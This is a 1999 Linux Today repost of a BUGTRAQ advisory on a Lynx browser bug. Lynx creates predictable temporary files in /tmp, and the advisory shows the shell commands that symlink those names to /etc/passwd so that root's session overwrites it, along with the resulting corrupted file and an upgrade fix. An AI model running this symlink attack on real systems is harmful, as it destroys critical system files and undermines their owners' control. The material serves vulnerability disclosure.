Security hole in Lynx | Linux Today
Security
SHARE
Facebook X Pinterest WhatsApp

Security hole in Lynx

Written By
Web Webster
Web Webster
Feb 11, 1999 
Juan Diego Bolanos posted to BUGRAQ:

Subject: Lynx /tmp problem

Hello....

I have found a bug in Lynx all versions, except the latest stable
release...

lynx create temporary files in /tmp in this way....


L[num proc]-xTMP.html

where

[num proc] is the proc number in the machine
x is a number from 0 to 9

if i run lynx like any user, for example root we see this

earthworm:~$ ps
  PID TTY STAT  TIME COMMAND
   91   1 SW   0:06 (bash)
   94   4 S    0:05 -bash
   95   5 SW   0:06 (bash)
 3867  a3 S    0:00 pppd -detach defaultroute crtscts modem 192.168.2.6:
 3870   3 SW   0:02 (ssh)
 3894   4 T    0:00 lynx
 3898   4 R    0:00 ps

then the files in /tmp created by lynx will be..

L3894-0TMP.html
L3894-1TMP.html
L3894-2TMP.html
L3894-3TMP.html
L3894-4TMP.html
L3894-5TMP.html
L3894-6TMP.html
L3894-7TMP.html
L3894-8TMP.html
L3894-9TMP.html

if i make a symlink
from all of this files to any file in the system, for example....


earthworm:~$ cd /tmp
earthworm:/tmp$ ln -s /etc/passwd  L3894-0TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-1TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-2TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-3TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-4TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-5TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-6TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-7TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-8TMP.html
earthworm:/tmp$ ln -s /etc/passwd  L3894-9TMP.html

and now root (in this example) try to download a file, or press the
backspace key to reach the history list, the file i have linked (in this
case /etc/passwd) will be replaced with it... and now is owned by root...

for example i got this in my system...

earthworm:/tmp$ cat /etc/passwd

<head>
<title>Lynx History Page</title>
</head>
<body>
<h1>You have reached the History Page</h1>
<h2>Lynx Version 2.8rel2</h2>
<pre><em>You selected:</em>
  <em>0</em>. <tab id=t0><a href="LYNXHIST:0">Internet Firewalls Frequently Asked Questions</a>
<tab to=t0>file://localhost/root/firefaq.html
</pre>
</body>


like you see, the file is lost now...

this bug is lynx specific, so all OS are vulnerables..

Fix, upgrade to the latest lynx version, i have checked it, and it appear
to use a L[proc num]-xTMP.html where x is from 0 to ???...

i hope it is already fixed, creating 100 symlinks are not to hard :)

the lynx team know this yet.

by...


Juan Diego

Lynx’s homepage is http://lynx.browser.org -lt ed
Web Webster

Web Webster

Web Webster has more than 20 years of writing and editorial experience in the tech sector. He’s written and edited news, demand generation, user-focused, and thought leadership content for business software solutions, consumer tech, and Linux Today, he edits and writes for a portfolio of tech industry news and analysis websites including webopedia.com, and DatabaseJournal.com.

Linux Today Logo

LinuxToday is a trusted, contributor-driven news resource supporting all types of Linux users. Our thriving international community engages with us through social media and frequent content contributions aimed at solving problems ranging from personal computing to enterprise-level IT operations. LinuxToday serves as a home for a community that struggles to find comparable information elsewhere on the web.

facebook
linkedin
x

Company

Contact us

Categories

News IT Management Infrastructure Developer Security High Performance Storage Blog

Property of TechnologyAdvice. © 2026 TechnologyAdvice. All Rights Reserved

Advertiser Disclosure: Some of the products that appear on this site are from companies from which TechnologyAdvice receives compensation. This compensation may impact how and where products appear on this site including, for example, the order in which they appear. TechnologyAdvice does not include all companies or all types of products available in the marketplace.

Terms of Service Privacy Policy California - Do Not Sell My Information